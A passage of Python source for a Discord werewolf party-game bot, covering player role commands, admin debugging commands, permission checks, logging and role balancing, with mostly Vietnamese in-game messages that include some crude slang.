'.join(parameters.split(' ')[1:]) temp_player = get_player(player) if temp_player: session[1][temp_player][2] = target await reply(message, "Successfully set **{}**'s target to **{}**.".format(get_name(temp_player), target)) else: await reply(message, "Cannot find player named **" + player + "**") await log(2, "{0} ({1}) FORCE {2}".format(message.author.name, message.author.id, parameters)) @cmd('session', [1, 1], "```\n{0}session takes no arguments\n\nReplies with the contents of the session variable in pm for debugging purposes. Admin only.```") async def cmd_session(message, parameters): await client.send_message(message.author, "```py\n{}\n```".format(str(session))) await log(2, "{0} ({1}) SESSION".format(message.author.name, message.author.id)) @cmd('time', [0, 0], "```\n{0}time không cần thêm cú pháp\n\nXem thời gian trong game.```", 't') async def cmd_time(message, parameters): if session[0]: seconds = 0 timeofday = '' sunstate = '' if session[2]: seconds = DAY_TIMEOUT - (datetime.now() - session[3][1]).seconds timeofday = 'buổi sáng' sunstate = 'hoàng hôn' else: seconds = NIGHT_TIMEOUT - (datetime.now() - session[3][0]).seconds timeofday = 'buổi tối' sunstate = 'bình minh' await reply(message, "Bây giờ là **{0}**. Có **{1:02d}:{2:02d}** tới khi {3}.".format(timeofday, seconds // 60, seconds % 60, sunstate)) else: if len(session[1]) > 0: timeleft = GAME_START_TIMEOUT - (datetime.now() - session[5]).seconds await reply(message, "Còn **{0:02d}:{1:02d}** tới khi game tự hủy. :cry:" "GAME_START_TIMEOUT is currently set to **{2:02d}:{3:02d}**.".format( timeleft // 60, timeleft % 60, GAME_START_TIMEOUT // 60, GAME_START_TIMEOUT % 60)) @cmd('give', [2, 0], "```\n{0}give <player>\n\nNếu là thầy bùa, đưa bùa cho <player>. Bạn có thể xem bùa mình đang giữ bằng lệnh `myrole` trong chat riêng với bot.```") async def cmd_give(message, parameters): if not session[0] or message.author.id not in session[1] or session[1][message.author.id][1] not in ['shaman', 'crazed shaman'] or not session[1][message.author.id][0]: return if session[2]: await reply(message, "Bạn chỉ có thể đưa bùa chú vào ban đêm.") return if session[1][message.author.id][2] not in totems: await reply(message, "Bạn đã đưa bùa chú cho ** rồi!" + get_name(session[1][message.author.id][2]) + "**.") else: if parameters == "": await reply(message, roles[session[1][message.author.id][1]][2]) else: player = get_player(parameters) if player: if player in [x for x in session[1] if not session[1][x][0]]: await reply(message, "Người chơi **" + get_name(player) + "** chết rồi!") else: totem = session[1][message.author.id][2] session[1][player][4].append(totem) session[1][message.author.id][2] = player await reply(message, "Bạn đã đưa bùa cho ** :smiling_imp:" + get_name(player) + "**.") await log(1, "{0} ({1}) GAVE {2} ({3}) {4}".format(get_name(message.author.id), message.author.id, get_name(player), player, totem)) else: await reply(message, "Không tìm thấy người chơi " + parameters) @cmd('info', [0, 0], "```\n{0}info không cần thêm cú pháp\n\nCho thông tin cách hoạt động của game.```") async def cmd_info(message, parameters): msg = "Trong trò chơi, có 2 phe, dân làng và ma sói. Dân làng cố gắng giết hết sói, ngược lại sói cố gắng ăn hết dân làng.\n" msg += "Có 2 giai đoạn, đêm và ngày. Vào ban đêm, Phe sói chọn 1 nạn nhân để giết, Và các dân làng có chức năng đặc biệt như tiên tri hoạt động. " msg += "Vào ban ngày, Dân làng bàn loạn với nhau và chọn người để treo cổ. " msg += "Khi bạn đã chết, Bạn không thể chat ở channel game nhưng có thể chat ở các channel Musik, Off-topic và Spectate.\n\n" msg += "Để tham gia game, dùng lệnh `{0}join`. Nếu bạn không chat được ở channel game, thì bạn đã chết hoặc có 1 game đang diễn ra.\n" msg += "Để xem danh sách các vai, xài lệnh `{0}roles`. Để biết chi tiết của 1 vai, xài `{0}role <vai>`. Để xem diễn biến của game, xài `{0}stats`. " msg += "Để xem danh sách các lệnh, xài `{0}list`. Để có chi tiết về mỗi lệnh, xài `{0}help <lệnh>`. Để xem thời gian trong game, xài `{0}time`.\n\n" msg += "Hãy cho Lucifer biết các lỗi mà các bạn gặp phải." await reply(message, msg.format(BOT_PREFIX)) @cmd('notify_role', [0, 0], "```\n{0}notify_role [<true|false>]\n\nGives or take the " + WEREWOLF_NOTIFY_ROLE_NAME + " role.```") async def cmd_notify_role(message, parameters): if not WEREWOLF_NOTIFY_ROLE: await reply(message, "Error: A " + WEREWOLF_NOTIFY_ROLE_NAME + " Vai không tồn tại, hãy cho Lucifer biết.") return member = client.get_server(WEREWOLF_SERVER).get_member(message.author.id) if not member: await reply(message, "You are not in the server!") has_role = (WEREWOLF_NOTIFY_ROLE in member.roles) if parameters == '': has_role = not has_role elif parameters in ['true', '+', 'yes']: has_role = True elif parameters in ['false', '-', 'no']: has_role = False else: await reply(message, commands['notify_role'][2].format(BOT_PREFIX)) return if has_role: await client.add_roles(member, WEREWOLF_NOTIFY_ROLE) await reply(message, "You will be notified by @" + WEREWOLF_NOTIFY_ROLE.name + ".") else: await client.remove_roles(member, WEREWOLF_NOTIFY_ROLE) await reply(message, "You will not be notified by @" + WEREWOLF_NOTIFY_ROLE.name + ".") @cmd('ignore', [1, 1], "```\n{0}ignore <add|remove|list> <user>\n\nAdds or removes <user> from the ignore list, or outputs the ignore list.```") async def cmd_ignore(message, parameters): parameters = ' '.join(message.content.strip().split(' ')[1:]) parameters = parameters.strip() global IGNORE_LIST if parameters == '': await reply(message, commands['ignore'][2].format(BOT_PREFIX)) else: action = parameters.split(' ')[0].lower() target = ' '.join(parameters.split(' ')[1:]) member_by_id = client.get_server(WEREWOLF_SERVER).get_member(target.strip('<@!>')) member_by_name = client.get_server(WEREWOLF_SERVER).get_member_named(target) member = None if member_by_id: member = member_by_id elif member_by_name: member = member_by_name if action not in ['+', 'add', '-', 'remove', 'list']: await reply(message, "Error: invalid flag `" + action + "`. Supported flags are add, remove, list") return if not member and action != 'list': await reply(message, "Error: could not find target " + target) return if action in ['+', 'add']: if member.id in IGNORE_LIST: await reply(message, member.name + " is already in the ignore list!") else: IGNORE_LIST.append(member.id) await reply(message, member.name + " was added to the ignore list.") elif action in ['-', 'remove']: if member.id in IGNORE_LIST: IGNORE_LIST.remove(member.id) await reply(message, member.name + " was removed from the ignore list.") else: await reply(message, member.name + " is not in the ignore list!") elif action == 'list': if len(IGNORE_LIST) == 0: await reply(message, "The ignore list is empty.") else: msg_dict = {} for ignored in IGNORE_LIST: member = client.get_server(WEREWOLF_SERVER).get_member(ignored) msg_dict[ignored] = member.name if member else "<user not in server with id " + ignored + ">" await reply(message, str(len(IGNORE_LIST)) + " ignored users:\n```\n" + '\n'.join([x + " (" + msg_dict[x] + ")" for x in msg_dict]) + "```") else: await reply(message, commands['ignore'][2].format(BOT_PREFIX)) await log(2, "{0} ({1}) IGNORE {2}".format(message.author.name, message.author.id, parameters)) # TODO async def cmd_pingif(message, parameters): global pingif_dict if parameters == '': if message.author.id in pingif_dict: await reply(message, "You will be notified when there are at least **{}** players.".format(pingif_dict[message.author.id])) else: await reply(message, "You have not set a pingif yet. `{}pingif <number of players>`".format(BOT_PREFIX)) elif parameters.isdigit(): num = int(parameters) if num in range(MIN_PLAYERS, MAX_PLAYERS + 1): pingif_dict[message.author.id] = num await reply(message, "You will be notified when there are at least **{}** players.".format(pingif_dict[message.author.id])) else: await reply(message, "Please enter a number between {} and {} players.".format(MIN_PLAYERS, MAX_PLAYERS)) else: await reply(message, "Please enter a valid number of players to be notified at.") @cmd('online', [1, 1], "```\n{0}online takes no arguments\n\nNotifies all online users.```") async def cmd_online(message, parameters): members = [x.id for x in message.server.members] online = ["<@{}>".format(x) for x in members if is_online(x)] await reply(message, "PING! {}".format(''.join(online))) @cmd('notify', [0, 0], "```\n{0}notify [<true|false>]\n\nNotifies all online users who want to be notified, or adds/removes you from the notify list.```") async def cmd_notify(message, parameters): if session[0]: return notify = message.author.id in notify_me if parameters == '': online = ["<@{}>".format(x) for x in notify_me if is_online(x) and x not in session[1]] await reply(message, "PING! {}".format(''.join(online))) elif parameters in ['true', '+', 'yes']: if notify: await reply(message, "Bạn đã ở trong danh sách sẽ được thông báo rồi.") return notify_me.append(message.author.id) await reply(message, "Bạn sẽ được thông báo khi có game bởi {}notify.".format(BOT_PREFIX)) elif parameters in ['false', '-', 'no']: if not notify: await reply(message, "Bạn không nằm trong danh sách được thông báo.") return notify_me.remove(message.author.id) await reply(message, "Bạn sẽ không được thông báo bởi {}notify.".format(BOT_PREFIX)) else: await reply(message, commands['notify'][2].format(BOT_PREFIX)) @cmd('getrole', [1, 1], "```\n{0}getrole <player> <revealtype>\n\nTests get_role command.```") async def cmd_getrole(message, parameters): if not session[0] or parameters == '': await reply(message, commands['getrole'][2].format(BOT_PREFIX)) return player = parameters.split(' ')[0] revealtype = ' '.join(parameters.split(' ')[1:]) temp_player = get_player(player) if temp_player: role = get_role(temp_player, revealtype) await reply(message, "**{}** is a **{}** using revealtype **{}**".format(get_name(temp_player), role, revealtype)) else: await reply(message, "Cannot find player named **" + player + "**") @cmd('visit', [2, 0], "```\n{0}visit <player>\n\nNếu là Harlot, ghé thăm <player>. Bạn có thể ở nhà bằng cách thăm chính mình. " "Bạn sẽ chết nếu thăm 1 con sói hoặc thăm nạn nhân 1 con sói.```") async def cmd_visit(message, parameters): if not session[0] or message.author.id not in session[1] or session[1][message.author.id][1] != 'harlot' or not session[1][message.author.id][0]: return if session[2]: await reply(message, "Chỉ có thể ghé thăm vào ban đêm.") return if session[1][message.author.id][2]: await reply(message, "Bạn đã đang ngủ với **{}** rồi!.:cry:".format(get_name(session[1][message.author.id][2]))) else: if parameters == "": await reply(message, roles[session[1][message.author.id][1]][2]) else: player = get_player(parameters) if player: if player == message.author.id: await reply(message, "Bạn đã chọn ở nhà.") session[1][message.author.id][2] = message.author.id await log(1, "{0} ({1}) STAY HOME".format(get_name(message.author.id), message.author.id)) elif player in [x for x in session[1] if not session[1][x][0]]: await reply(message, "Player **" + get_name(player) + "** is dead!") else: await reply(message, "Bạn đang ngủ cùng **{}**. Nệm ấm chăn êm :>!".format(get_name(player))) session[1][message.author.id][2] = player member = client.get_server(WEREWOLF_SERVER).get_member(player) try: await client.send_message(member, "Bạn đang ngủ cùng Thúy Kiều. Ngủ ngon :>!".format(get_name(message.author.id))) except: pass await log(1, "{0} ({1}) VISIT {2} ({3})".format(get_name(message.author.id), message.author.id, get_name(player), player)) else: await reply(message, "Không tìm thấy người chơi " + parameters) @cmd('totem', [0, 0], "```\n{0}totem [<totem>]\n\nCho biết thông tin về 1 lá bùa, hoặc cho danh sách các bùa trong game.```", 'totems') async def cmd_totem(message, parameters): if not parameters == '': reply_totems = [] for totem in totems: if totem.startswith(parameters): reply_totems.append(totem) if _autocomplete(parameters, totems)[1] == 1: totem = _autocomplete(parameters, totems)[0] reply_msg = "```\n" reply_msg += totem[0].upper() + totem[1:].replace('_', ' ') + "\n\n" reply_msg += totems[totem] + "```" await reply(message, reply_msg) return await reply(message, "Các bùa đang có: " + ", ".join(sorted([x.replace('_', ' ') for x in totems]))) @cmd('fgame', [1, 2], "```\n{0}fgame [<gamemode>]\n\nForcibly sets or unsets [<gamemode>].```") async def cmd_fgame(message, parameters): if session[0]: return if parameters == '': if session[6] != '': session[6] = '' await reply(message, "Successfully unset gamemode.") else: await reply(message, "Gamemode has not been set.") else: if parameters.startswith('roles'): role_string = ' '.join(parameters.split(' ')[1:]) if role_string == '': await reply(message, "`{}fgame roles wolf:1,traitor:1,shaman:2,cursed villager:2,etc.`".format(BOT_PREFIX)) else: session[6] = parameters await reply(message, "Successfully set gamemode roles to `{}`".format(role_string)) else: choices, num = _autocomplete(parameters, gamemodes) if num == 1: session[6] = choices await reply(message, "Successfuly set gamemode to **{}**.".format(choices)) elif num > 1: await reply(message, "Multiple choices: {}".format(', '.join(sorted(choices)))) else: await reply(message, "Could not find gamemode {}".format(parameters)) await log(2, "{0} ({1}) FGAME {2}".format(message.author.name, message.author.id, parameters)) @cmd('ftemplate', [1, 2], "```\n{0}ftemplate <player> [<add|remove|set>] [<template1 [template2 ...]>]\n\nManipulates a player's templates.```") async def cmd_ftemplate(message, parameters): if not session[0]: return if parameters == '': await reply(message, commands['ftemplate'][2].format(BOT_PREFIX)) return params = parameters.split(' ') player = get_player(params[0]) if len(params) > 1: action = parameters.split(' ')[1] else: action = "" if len(params) > 2: templates = parameters.split(' ')[2:] else: templates = [] if player: reply_msg = "Successfully " if action in ['+', 'add', 'give']: session[1][player][3] += templates reply_msg += "added templates **{0}** to **{1}**." elif action in ['-', 'remove', 'del']: for template in templates[:]: if template in session[1][player][3]: session[1][player][3].remove(template) else: templates.remove(template) reply_msg += "removed templates **{0}** from **{1}**." elif action in ['=', 'set']: session[1][player][3] = templates reply_msg += "set **{1}**'s templates to **{0}**." else: reply_msg = "**{1}**'s templates: " + ', '.join(session[1][player][3]) else: reply_msg = "Could not find player {1}." await reply(message, reply_msg.format(', '.join(templates), get_name(player))) await log(2, "{0} ({1}) FTEMPLATE {2}".format(message.author.name, message.author.id, parameters)) @cmd('fother', [1, 2], "```\n{0}fother <player> [<add|remove|set>] [<other1 [other2 ...]>]\n\nManipulates a player's other flag (totems, traitor).```") async def cmd_fother(message, parameters): if not session[0]: return if parameters == '': await reply(message, commands['fother'][2].format(BOT_PREFIX)) return params = parameters.split(' ') player = get_player(params[0]) if len(params) > 1: action = parameters.split(' ')[1] else: action = "" if len(params) > 2: others = parameters.split(' ')[2:] else: others = [] if player: reply_msg = "Successfully " if action in ['+', 'add', 'give']: session[1][player][4] += others reply_msg += "added **{0}** to **{1}**'s other flag." elif action in ['-', 'remove', 'del']: for other in others[:]: if other in session[1][player][4]: session[1][player][4].remove(other) else: others.remove(other) reply_msg += "removed **{0}** from **{1}**'s other flag." elif action in ['=', 'set']: session[1][player][4] = others reply_msg += "set **{1}**'s other flag to **{0}**." else: reply_msg = "**{1}**'s other flag: " + ', '.join(session[1][player][4]) else: reply_msg = "Could not find player {1}." await reply(message, reply_msg.format(', '.join(others), get_name(player))) await log(2, "{0} ({1}) FOTHER {2}".format(message.author.name, message.author.id, parameters)) @cmd('faftergame', [2, 2], "```\n{0}faftergame <command> [<parameters>]\n\nSchedules <command> to run with [<parameters>] after the next game ends.```") async def cmd_faftergame(message, parameters): if parameters == "": await reply(message, commands['faftergame'][2].format(BOT_PREFIX)) return command = parameters.split(' ')[0] if command in commands: global faftergame faftergame = message await reply(message, "Command `{}` will run after the next game ends.".format(parameters)) else: await reply(message, "{} is not a valid command!".format(command)) @cmd('uptime', [0, 0], "```\n{0}uptime takes no arguments\n\nChecks the bot's uptime.```") async def cmd_uptime(message, parameters): delta = datetime.now() - starttime output = [[delta.days, 'day'], [delta.seconds // 3600, 'hour'], [delta.seconds // 60 % 60, 'minute'], [delta.seconds % 60, 'second']] for i in range(len(output)): if output[i][0] != 1: output[i][1] += 's' reply_msg = '' if output[0][0] != 0: reply_msg += "{} {} ".format(output[0][0], output[0][1]) for i in range(1, len(output)): reply_msg += "{} {} ".format(output[i][0], output[i][1]) reply_msg = reply_msg[:-1] await reply(message, "Uptime: **{}**".format(reply_msg)) @cmd('fstasis', [1, 1], "```\n{0}fstasis <player> [<add|remove|set>] [<amount>]\n\nManipulates a player's stasis.```") async def cmd_fstasis(message, parameters): if parameters == '': await reply(message, commands['fstasis'][2].format(BOT_PREFIX)) return params = parameters.split(' ') player = params[0].strip('<!@>') member = client.get_server(WEREWOLF_SERVER).get_member(player) name = "user not in server with id " + player if member: name = member.display_name if len(params) > 1: action = parameters.split(' ')[1] else: action = '' if len(params) > 2: amount = parameters.split(' ')[2] if amount.isdigit(): amount = int(amount) else: amount = -1 else: amount = -2 if player.isdigit(): if action and amount >= -1: if amount >= 0: if player not in stasis: stasis[player] = 0 reply_msg = "Successfully " if action in ['+', 'add', 'give']: stasis[player] += amount reply_msg += "increased **{0}** ({1})'s stasis by **{2}**." elif action in ['-', 'remove', 'del']: amount = min(amount, stasis[player]) stasis[player] -= amount reply_msg += "decreased **{0}** ({1})'s stasis by **{2}**." elif action in ['=', 'set']: stasis[player] = amount reply_msg += "set **{0}** ({1})'s stasis to **{2}**." else: if player not in stasis: amount = 0 else: amount = stasis[player] reply_msg = "**{0}** ({1}) is in stasis for **{2}** game{3}." else: reply_msg = "Stasis must be a non-negative integer." else: if player not in stasis: amount = 0 else: amount = stasis[player] reply_msg = "**{0}** ({1}) is in stasis for **{2}** game{3}." else: reply_msg = "Invalid mention/id: {0}." await reply(message, reply_msg.format(name, player, amount, '' if int(amount) == 1 else 's')) await log(2, "{0} ({1}) FSTASIS {2}".format(message.author.name, message.author.id, parameters)) @cmd('gamemode', [0, 0], "```\n{0}gamemode [<gamemode>]\n\nCho biết thông tin về [<gamemode>] hoặc cho danh sách " "các chế độ chơi.```", 'game', 'gamemodes') async def cmd_gamemode(message, parameters): gamemode, num = _autocomplete(parameters, gamemodes) if num == 1 and parameters != '': await reply(message, "```\nGamemode: {}\nPlayers: {}\nDescription: {}\n\nXài lệnh " "`!roles {} table` để xem các vai có trong gamemode này.```".format(gamemode, str(gamemodes[gamemode]['min_players']) + '-' + str(gamemodes[gamemode]['max_players']), gamemodes[gamemode]['description'], gamemode)) else: await reply(message, "Available gamemodes: {}".format(', '.join(sorted(gamemodes)))) @cmd('verifygamemode', [1, 1], "```\n{0}verifygamemode [<gamemode>]\n\nChecks to make sure [<gamemode>] is valid.```", 'verifygamemodes') async def cmd_verifygamemode(message, parameters): if parameters == '': await reply(message, "```\n{}\n```".format(verify_gamemodes())) elif _autocomplete(parameters, gamemodes)[1] == 1: await reply(message, "```\n{}\n```".format(verify_gamemode(_autocomplete(parameters, gamemodes)[0]))) else: await reply(message, "Éo có gamemode: {}".format(parameters)) @cmd('shoot', [0, 2], "```\n{0}shoot <player>\n\nNếu có súng, bắn <player> vào ban ngày, chỉ có thể dùng lệnh này ở khung chat server.```") async def cmd_shoot(message, parameters): if not session[0] or message.author.id not in session[1] or not session[1][message.author.id][0]: return if 'gunner' not in get_role(message.author.id, 'templates'): try: await client.send_message(message.author, "Ảo tướng sức mạnh?. :joy:") except discord.Forbidden: pass return if not session[2]: try: await client.send_message(message.author, "Bạn chỉ có thể bắn vào ban ngày.") except: pass finally: return msg = '' pm = False ded = None if session[1][message.author.id][4].count('bullet') < 1: msg = "Chú éo còn đạn." pm = True else: if parameters == "": msg = commands['shoot'][2].format(BOT_PREFIX) pm = True else: target = get_player(parameters.split(' ')[0]) if not target: target = get_player(parameters) if not target: msg = 'Không tìm thấy người chơi {}'.format(parameters) elif target == message.author.id: msg = "Cầm súng ngược kìa!.:joy:" elif not session[1][target][0]: msg = "Người chơi **{}** chết rồi!".format(get_name(target)) else: wolf = get_role(message.author.id, 'role') in WOLFCHAT_ROLES session[1][message.author.id][4].remove('bullet') outcome = '' if wolf: if get_role(target, 'role') in WOLFCHAT_ROLES: outcome = 'miss' else: if get_role(target, 'role') in ACTUAL_WOLVES: if get_role(target, 'role') in ['werekitten']: outcome = random.choice(['suicide'] * GUNNER_SUICIDE + ['miss'] * (GUNNER_MISS + GUNNER_HEADSHOT + GUNNER_INJURE)) else: outcome = 'killwolf' if outcome == '': outcome = random.choice(['miss'] * GUNNER_MISS + ['suicide'] * GUNNER_SUICIDE \ + ['killvictim'] * GUNNER_HEADSHOT + ['injure'] * GUNNER_INJURE) if outcome in ['injure', 'killvictim', 'killwolf']: msg = "**{}** đã bắn **{}** bằng 1 viên đạn bạc! :scream:\n\n".format(get_name(message.author.id), get_name(target)) if outcome == 'miss': msg += "**{}** đéo biết cách cầm súng và bắn trượt! :joy:".format(get_name(message.author.id)) elif outcome == 'killwolf': msg += "**{}** là **{}** đã bị bắt toét óc bởi viên đạn bạc! :joy:".format(get_name(target), get_role(target, 'death')) ded = target elif outcome == 'suicide': msg += "Trời đụ! **{}** bảo trì súng éo tốt và súng nổ banh mặt bạn ấy rồi! :joy: ".format(get_name(message.author.id)) msg += "Dân làng tiếc thương một **gunner** :cry:.".format(get_role(message.author.id, 'death')) ded = message.author.id elif outcome == 'killvictim': msg += "**{}** không phải là sói nhưng đã bị trọng thương. Làng đã giết nhầm! :cry:".format( get_name(target), get_role(target, 'death')) ded = target elif outcome == 'injure': msg += "**{}** là một dân đen và đã bị thương :cry:. May thay vết thương nhẹ và đã lành vào sáng hôm sau.:smiley:".format( get_name(target)) session[1][target][4].append('injured') else: msg += "Cái đéo? (đây là 1 lỗi, hãy báo cho Lucifer)" await log(1, "{} ({}) SHOOT {} ({}) WITH OUTCOME {}".format(get_name(message.author.id), message.author.id, get_name(target), target, outcome)) if pm: target = message.author else: target = client.get_channel(GAME_CHANNEL) try: await client.send_message(target, msg) except discord.Forbidden: pass if ded: session[1][ded][0] = False member = client.get_server(WEREWOLF_SERVER).get_member(ded) if member: await client.remove_roles(member, PLAYERS_ROLE) await check_traitor() @cmd('fsay', [1, 1], "```\n{0}fsay <message>\n\nSends <message> to the lobby channel.```") async def cmd_fsay(message, parameters): if parameters: await client.send_message(client.get_channel(GAME_CHANNEL), parameters) await log(2, "{} ({}) FSAY {}".format(message.author.name, message.author.id, parameters)) else: await reply(message, commands['fsay'][2].format(BOT_PREFIX)) @cmd('observe', [2, 0], "```\n{0}observe <player>\n\nNếu bạn là Werecrow, cho bạn biết rằng <player> có ở trên giường hay không.```" "Nếu là pháp sư, cho biết nếu <player> có năng lực đặc biệt hay không VD:(seer, etc.).```") async def cmd_observe(message, parameters): if not session[0] or message.author.id not in session[1] or get_role(message.author.id, 'role') not in COMMANDS_FOR_ROLE['observe'] or not session[1][message.author.id][0]: return if session[2]: await reply(message, "Bạn chỉ có thể quan sát vào buổi tối.") return if get_role(message.author.id, 'role') == 'werecrow': if 'observe' in session[1][message.author.id][4]: await reply(message, "You are already observing someone!.") else: if parameters == "": await reply(message, roles[session[1][message.author.id][1]][2]) else: player = get_player(parameters) if player: if player == message.author.id: await reply(message, "That would be a waste.") elif player in [x for x in session[1] if roles[get_role(x, 'role')][0] == 'wolf' and get_role(x, 'role') != 'cultist']: await reply(message, "Observing another wolf is a waste of time.") elif not session[1][player][0]: await reply(message, "Player **" + get_name(player) + "** is dead!") else: session[1][message.author.id][4].append('observe') await reply(message, "You transform into a large crow and start your flight to **{0}'s** house. You will " "return after collecting your observations when day begins.".format(get_name(player))) await wolfchat("**{}** is observing **{}**.".format(get_name(message.author.id), get_name(player))) await log(1, "{0} ({1}) OBSERVE {2} ({3})".format(get_name(message.author.id), message.author.id, get_name(player), player)) while not session[2] and win_condition() == None and session[0]: await asyncio.sleep(0.1) if 'observe' in session[1][message.author.id][4]: session[1][message.author.id][4].remove('observe') if get_role(player, 'role') in ['seer', 'harlot', 'hunter']\ and session[1][player][2] in set(session[1]) - set(player)\ or get_role(player, 'role') in ['shaman', 'crazed shaman']\ and session[1][player][2] in session[1]: msg = "not in bed all night" else: msg = "sleeping all night long" try: await client.send_message(message.author, "As the sun rises, you conclude that **{}** was {}, and you fly back to your house.".format( get_name(player), msg)) except discord.Forbidden: pass else: await reply(message, "Could not find player " + parameters) elif get_role(message.author.id, 'role') == 'sorcerer': if session[1][message.author.id][2]: await reply(message, "You have already used your power.") elif parameters == "": await reply(message, roles[session[1][message.author.id][1]][2]) else: player = get_player(parameters) if player: if player == message.author.id: await reply(message, "Rảnh háng quá.") elif player in [x for x in session[1] if roles[get_role(x, 'role')][0] == 'wolf' and get_role(x, 'role') != 'cultist']: await reply(message, "Đi rình 1 con sói là 1 điêu thật rảnh háng.") elif player in [x for x in session[1] if not session[1][x][0]]: await reply(message, "Người chơi **" + get_name(player) + "** chết rồi!") else: session[1][message.author.id][2] = player target_role = get_role(player, 'role') if target_role in ['seer', 'oracle', 'augur']: debug_msg = target_role msg = "**{}** là một **{}**!".format(get_name(player), get_role(player, 'role')) else: debug_msg = "là người bình thường" msg = "**{}** không có khả năng đặc biệt.".format(get_name(player)) await wolfchat("**{}** đang theo dõi **{}**.".format(get_name(message.author.id), get_name(player))) await reply(message, "Sau khi thực thi nghi lễ, bạn nhận thấy " + msg) await log(1, "{0} ({1}) OBSERVE {2} ({3}) AS {4}".format(get_name(message.author.id), message.author.id, get_name(player), player, debug_msg)) else: await reply(message, "Không tìm thấy người chơi " + parameters) @cmd('id', [2, 0], "```\n{0}id <player>\n\nNếu bạn là thám tử, điều tra <player> vào ban ngày.```") async def cmd_id(message, parameters): if not session[0] or message.author.id not in session[1] or get_role(message.author.id, 'role') not in COMMANDS_FOR_ROLE['id'] or not session[1][message.author.id][0]: return if not session[2]: await reply(message, "Bạn chỉ có thể điều tra vào buổi sáng.") return if 'investigate' in session[1][message.author.id][4]: await reply(message, "Bạn đang có 1 cuộc điều tra đang tiến hành rồi.") else: if parameters == "": await reply(message, roles[session[1][message.author.id][1]][2]) else: player = get_player(parameters) if player: if player == message.author.id: await reply(message, "Rảnh háng quá đi điều tra chính mình -_-.") elif not session[1][player][0]: await reply(message, "Người chơi **" + get_name(player) + "** chết rồi!") else: session[1][message.author.id][4].append('investigate') await reply(message, "Kết quả của cuộc điều tra đã được đưa về. **{}** chính là **{}**!".format( get_name(player), get_role(player, 'role'))) await log(1, "{0} ({1}) INVESTIGATE {2} ({3})".format(get_name(message.author.id), message.author.id, get_name(player), player)) if random.random() < DETECTIVE_REVEAL_CHANCE: await wolfchat("Ai đó tình cờ làm rơi 1 số giấy tờ, nó cho biết **{}** chính là thám tử! :scream:".format(get_name(message.author.id))) await log(1, "{0} ({1}) DETECTIVE REVEAL".format(get_name(message.author.id), message.author.id)) while session[2] and win_condition() == None and session[0]: await asyncio.sleep(0.1) if 'investigate' in session[1][message.author.id][4]: session[1][message.author.id][4].remove('investigate') else: await reply(message, "Không tìm thấy người chơi " + parameters) @cmd('frevive', [1, 2], "```\n{0}frevive <player>\n\nRevives <player>. Xài để gỡ lỗi.```") async def cmd_frevive(message, parameters): if not session[0]: return if parameters == "": await reply(message, commands['frevive'][2].format(BOT_PREFIX)) else: player = get_player(parameters) if player: if session[1][player][0]: await reply(message, "Người chơi **{}** vẫn còn sống!".format(player)) else: session[1][player][0] = True await reply(message, ":thumbsup:") else: await reply(message, "Không tìm thấy người chơi {}".format(parameters)) @cmd('pass', [2, 0], "```\n{0}pass không cần thêm cú pháp\n\nChọn không làm việc hôm nay.```") async def cmd_pass(message, parameters): role = get_role(message.author.id, 'role') if not session[0] or message.author.id not in session[1] or role not in COMMANDS_FOR_ROLE['pass'] or not session[1][message.author.id][0]: return if session[2] and role in ('harlot', 'hunter'): await reply(message, "Bạn chỉ có thể xài bỏ qua vào ban đêm.") return if session[1][message.author.id][2] != '': return if role == 'harlot': session[1][message.author.id][2] = message.author.id await reply(message, "Bạn đã chọn ở nhà hôm nay.:zzz:") elif role == 'hunter': session[1][message.author.id][2] = message.author.id await reply(message, "Bạn đã chọn éo giết ai hôm nay.:joy:") else: await reply(message, "Cái đéo? (đây là 1 lỗi; hãy báo cho Lucifer") await log(1, "{0} ({1}) PASS".format(get_name(message.author.id), message.author.id)) ######### END COMMANDS ############# def has_privileges(level, message): if message.author.id == OWNER_ID: return True elif level == 1 and message.author.id in ADMINS: return True elif level == 0: return True else: return False async def reply(message, text): await client.send_message(message.channel, message.author.mention + ', ' + str(text)) async def parse_command(commandname, message, parameters): await log(0, 'Parsing command ' + commandname + ' with parameters `' + parameters + '` from ' + message.author.name + ' (' + message.author.id + ')') if commandname in commands: pm = 0 if message.channel.is_private: pm = 1 if has_privileges(commands[commandname][1][pm], message): try: await commands[commandname][0](message, parameters) except Exception: traceback.print_exc() print(session) msg = '```py\n{}\n```\n**session:**```py\n{}\n```'.format(traceback.format_exc(), session) await log(3, msg) await client.send_message(message.channel, "Có lỗi xảy ra và đã được ghi nhận.") elif has_privileges(commands[commandname][1][0], message): if session[0] and message.author.id in [x for x in session[1] if session[1][x][0]]: if commandname in COMMANDS_FOR_ROLE and (get_role(message.author.id, 'role') in COMMANDS_FOR_ROLE[commandname]\ or not set(get_role(message.author.id, 'templates')).isdisjoint(set(COMMANDS_FOR_ROLE[commandname]))): await reply(message, "Please use command " + commandname + " in channel.") elif has_privileges(commands[commandname][1][1], message): if session[0] and message.author.id in [x for x in session[1] if session[1][x][0]]: if commandname in COMMANDS_FOR_ROLE and get_role(message.author.id, 'role') in COMMANDS_FOR_ROLE[commandname]: try: await client.send_message(message.author, "Hãy xài lệnh " + commandname + " trong tin nhắn riêng với bot.") except discord.Forbidden: pass elif message.author.id in ADMINS: await reply(message, "Hãy xài lệnh " + commandname + " trong phần tin nhắn riêng với bot.") else: await log(2, 'User ' + message.author.name + ' (' + message.author.id + ') tried to use command ' + commandname + ' with parameters `' + parameters + '` without permissions!') async def log(loglevel, text): # loglevels # 0 = DEBUG # 1 = INFO # 2 = WARNING # 3 = ERROR levelmsg = {0 : '[DEBUG] ', 1 : '[INFO] ', 2 : '**[WARNING]** ', 3 : '**[ERROR]** <@' + OWNER_ID + '> ' } logmsg = levelmsg[loglevel] + str(text) with open(LOG_FILE, 'a', encoding='utf-8') as f: f.write("[{}] {}\n".format(datetime.now(), logmsg)) if loglevel >= MIN_LOG_LEVEL: await client.send_message(client.get_channel(DEBUG_CHANNEL), logmsg) def balance_roles(massive_role_list, default_role='villager', num_players=-1): if num_players == -1: num_players = len(session[1]) extra_players = num_players - len(massive_role_list) if extra_players > 0: massive_role_list += [default_role] * extra_players return (massive_role_list, "Không có đủ vai; Đã thêm {} {} vào danh sách vai".format(extra_players, default_role)) elif extra_players < 0: random.shuffle(massive_role_list) removed_roles = [] team_roles = [0, 0, 0] for role in massive_role_list: if role in WOLF_ROLES_ORDERED: team_roles[0] += 1 elif role in VILLAGE_ROLES_ORDERED: team_roles[1] += 1 elif role in NEUTRAL_ROLES_ORDERED: team_roles[2] += 1 for i in range(-1 * extra_players): team_fractions = list(x / len(massive_role_list) for x in team_roles) roles_to_remove = set() if team_fractions[0] > 0.35: roles_to_remove |= set(WOLF_ROLES_ORDERED) if team_fractions[1] > 0.7: 